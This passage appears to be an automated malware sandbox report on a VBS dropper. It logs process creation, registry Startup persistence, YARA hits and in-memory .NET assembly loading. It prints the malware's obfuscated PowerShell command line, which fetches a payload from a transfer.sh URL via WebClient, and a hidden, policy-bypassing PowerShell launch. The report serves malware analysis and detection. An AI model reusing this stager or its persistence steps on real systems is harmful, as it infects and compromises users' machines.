        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\594274bc
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\YBAXAKQXVYWIXQJDE.VBS"
        Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csCryptographic APIs: 'TransformFinalBlock'
        Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
        Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csCryptographic APIs: 'TransformFinalBlock'
        Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
        Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csCryptographic APIs: 'TransformFinalBlock'
        Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
        Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csCryptographic APIs: 'TransformFinalBlock'
        Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: ClassLibrary1.pdb source: powershell.exe, 0000000A.00000002.949909108.000001A658B40000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.944900247.000001A640AD2000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Se", "Unsupported parameter type 00000001", "Unsupported parameter type 00000009", "Unsupported parameter type 00000000")
        Source: Yara matchFile source: 11.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.powershell.exe.1a640e0e328.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.powershell.exe.1a640e0e328.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.powershell.exe.1a640c386a0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.powershell.exe.1a640da2068.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.944900247.000001A640AD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1Jump to behavior
        Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.0.aspnet_compiler.exe.400000.3.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.0.aspnet_compiler.exe.400000.3.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.0.aspnet_compiler.exe.400000.1.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: CprtyUcJjmbTk System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 11.0.aspnet_compiler.exe.400000.1.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.cs.Net Code: zdHEvbHcRdGfiz System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9ECE81E28 pushad ; retf 10_2_00007FF9ECE81E29
        Source: 11.0.aspnet_compiler.exe.400000.4.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csHigh entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
        Source: 11.2.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csHigh entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
        Source: 11.0.aspnet_compiler.exe.400000.2.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csHigh entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
        Source: 11.0.aspnet_compiler.exe.400000.0.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csHigh entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
        Source: 11.0.aspnet_compiler.exe.400000.3.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csHigh entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'
        Source: 11.0.aspnet_compiler.exe.400000.1.unpack, mTgCKVvEVrrb/UMGyaSpTAWXEgpoCF.csHigh entropy of concatenated method names: 'UopQUPbPvAIfbK', 'DINXhhgdKMhh', 'pWEswDPjAjDQ', 'ULlnWFYGBwEdPkIJQ', 'NuQnFaoqVAWATYOE', 'qtOMYgKknOvHOFrt', 'DBoIJBYRhmcbsMOB', 'BhICZLsZljiEwj', 'EXSwpOOwfCBsvmnv', 'OLlgboEdofF'

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

        Boot Survival

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
        Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
